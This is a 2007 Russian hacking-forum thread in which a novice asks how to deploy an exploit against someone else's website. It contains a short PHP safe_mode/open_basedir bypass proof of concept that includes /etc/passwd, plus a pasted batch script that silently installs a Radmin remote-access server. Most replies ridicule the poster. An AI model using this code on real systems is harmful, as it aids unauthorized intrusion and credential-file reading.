Как залить эксплоит на сайт?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Как залить эксплоит на сайт? - 2007-12-16 16:41:54.073333
|
|
|
Boomdor
Сообщений: 6
Оценки: 0
Присоединился: 2007-11-26 00:25:43.720000
|
Нашел уязвимость на одном сайте и эксплоит к ней.Как его теперь поставить на сайт?
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 17:15:24.023333
|
|
|
Kavenant
Сообщений: 21
Оценки: 0
Присоединился: 2007-12-16 14:13:34.723333
|
Что за сайт если не секрет?
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 17:54:07.210000
|
|
|
Boomdor
Сообщений: 6
Оценки: 0
Присоединился: 2007-11-26 00:25:43.720000
|
Ну сайт построен на php 5.1.6 эксплоит вот:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе. Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера.
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
А теперь как его залить?Через telnet?
B можно поподробней.
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 18:08:44.200000
|
|
|
Kavenant
Сообщений: 21
Оценки: 0
Присоединился: 2007-12-16 14:13:34.723333
|
Поисчи в гугле список команд для telnet, наверняка есть команда для заливки чего бы то нибыло на указанный адрес. Как вариант можешь попробовать скрипт для заливки сервера радмин на удаленный комп, может и прокатить:
Здесь приведен пример скрипта для Windows, который устанавливает Radmin сервер как сервис на компьютер, вам достаточно заменить пути к файлам на ваши значения. Для запуска такого скрипта на сетевом компьютере вы можете использовать login скрипты для Windows NT сетей:
net use z: \\server\d
copy "z:\install\radmin\r_server.exe" "c:\winnt\system32\r_server.exe"
copy "z:\install\radmin\raddrv.dll" "c:\winnt\system32\raddrv.dll"
copy "z:\install\radmin\admdll.dll" "c:\winnt\system32\admdll.dll"
c:\winnt\system32\r_server.exe /install /silence
regedit.exe z:\install\settings.reg
net use z: /delete
Внимание: Под WinNT, пользователь, запускающий этот скрипт, должен иметь права администратора для установки сервиса и драйвера.
Этот скрипт делает следующее:
1) Создает сетевой диск z: to \\server\d
2) Копирует файлы Radmin сервера в системный дирректорий Windows.
3) Устанавливает Radmin сервер как сервис.
4) Сохраняет настройки сервера в реестре.
5) Удаляет сетевой диск z:
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 18:15:41.046666
|
|
|
IIIokoJIagkaXeXe
Сообщений: 4
Оценки: 0
Присоединился: 2007-12-16 17:18:09.710000
|
А сплойт у тебя скомпилированый или просто *txt исходник с кодом С++?8|
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 19:10:53.190000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
quote:
ORIGINAL: IIIokoJIagkaXeXe
А сплойт у тебя скомпилированый или просто *txt исходник с кодом С++?8|
Уважаемая, а <? ?> вам ни о чем не говорит?
ЗЫ может в палату …..
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-16 23:08:51.020000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
/me пацталом, жжоте народ!)))))
Boomdor, этот сплоит только покажет /etc/passwd в котором 99% что небудет хэшей. А чтобы его залить тебе нужен шелл на самом серваке.
Kavenant, сам то подумал прежде чем запостил? причем тут обсалютно бесполезный скрипт под винду?!
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-17 13:19:26.786666
|
|
|
Kavenant
Сообщений: 21
Оценки: 0
Присоединился: 2007-12-16 14:13:34.723333
|
Ну вот, поумничать не дал 8|. Если честно я не знаю как залить эксплойт. Вижу сы соображаешь о чем речь, объясни как получить шелл на сервере, чтоб используя его залить сплойт.
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-17 22:03:32.100000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Kavenant
Ну вот, поумничать не дал 8|. Если честно я не знаю как залить эксплойт. Вижу сы соображаешь о чем речь, объясни как получить шелл на сервере, чтоб используя его залить сплойт.
ыыыы, а зачем тебе сплойт, если у тебя будет шелл? Ппц
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-17 22:48:14.463333
|
|
|
_NuClear
Сообщений: 8
Оценки: 0
Присоединился: 2007-12-17 01:48:34.450000
|
>>>ыыыы, а зачем тебе сплойт, если у тебя будет шелл? Ппц
:D:D:D:D без слоФФ
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-22 11:27:20.740000
|
|
|
SN99
Сообщений: 13
Оценки: 0
Присоединился: 2007-09-02 08:26:11.353333
|
шелл на самом серваке. - это как?
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-22 11:29:41.880000
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: SN99
шелл на самом серваке. - это как?
Ааааааааааа убил! ЖЖОШ! [sm=bj.gif][sm=bj.gif]
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-22 11:31:10.773333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: Kavenant
Ну вот, поумничать не дал 8|. Если честно я не знаю как залить эксплойт. Вижу сы соображаешь о чем речь, объясни как получить шелл на сервере, чтоб используя его залить сплойт.
1. Ломай, универсальной инструкции или метода нет.
2. Тот сплоит тебе ненужен.
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-23 19:33:49.396666
|
|
|
mobidic
Сообщений: 41
Оценки: 0
Присоединился: 2007-12-22 23:31:58.860000
|
сплойт залевейеш через команду выполнить —> пиши туду cmd и указывай на сплойт
но есть одно он не дас просто тебе залить сплойт
————————————-
http://hackzona.ucoz.kz
————————————-
Новостное обозрение софты сети на каждый день!
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-23 19:41:57.343333
|
|
|
blаcksun
Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
|
quote:
ORIGINAL: mobidic
сплойт залевейеш через команду выполнить —> пиши туду cmd и указывай на сплойт
но есть одно он не дас просто тебе залить сплойт
————————————-
http://hackzona.ucoz.kz
————————————-
Новостное обозрение софты сети на каждый день!
[sm=bj.gif][sm=bj.gif][sm=bj.gif][sm=bj.gif] тебя целиков в палату надо!
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-23 19:43:27.140000
|
|
|
Systemnik
Сообщений: 174
Оценки: 0
Присоединился: 2007-03-02 17:24:55.663333
|
Я чуть неупал со стула. реально [sm=bj.gif][sm=bj.gif]
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-23 19:45:52.143333
|
|
|
dew
Сообщений: 316
Оценки: 0
Присоединился: 2006-12-09 21:39:29.470000
|
quote:
ORIGINAL: Boomdor
Ну сайт построен на php 5.1.6 эксплоит вот:
Уязвимость позволяет удаленному пользователь получить доступ к важным данным на системе. Уязвимость существует из-за недостаточного ограничения на смену параметров safe_mode и open_basedir в функции ini_restore(). Если эти ограничения установлены в настройках виртуального хоста Web сервера, а в файле php.ini находятся значения по умолчанию, злоумышленник может восстановить значения по умолчанию и обойти ограничения, установленный в конфигурационном файле Web сервера.
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>
А теперь как его залить?Через telnet?
B можно поподробней.
этот сплоит обхода safe_mode думаю тебе он не пригодится, не одного ответа по существу нету……
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-25 18:04:56.696666
|
|
|
mobidic
Сообщений: 41
Оценки: 0
Присоединился: 2007-12-22 23:31:58.860000
|
ржу не могу…. вы здес как куЛХАцкеры))
если взломали стучите в аську:D
369008906
————————————-
http://hackzona.ucoz.kz
————————————-
Новостное обозрение софты сети на каждый день!
|
|
|
|
|
RE: Как залить эксплоит на сайт? - 2007-12-26 11:08:41.063333
|
|
|
dew
Сообщений: 316
Оценки: 0
Присоединился: 2006-12-09 21:39:29.470000
|
quote:
ORIGINAL: mobidic
ржу не могу…. вы здес как куЛХАцкеры))
если взломали стучите в аську:D
369008906
сам понял че сказал? сформулируй мыслю свою, кого взломали , зачем тебе стучать? не фига не понял
|
|
|
|
|
|
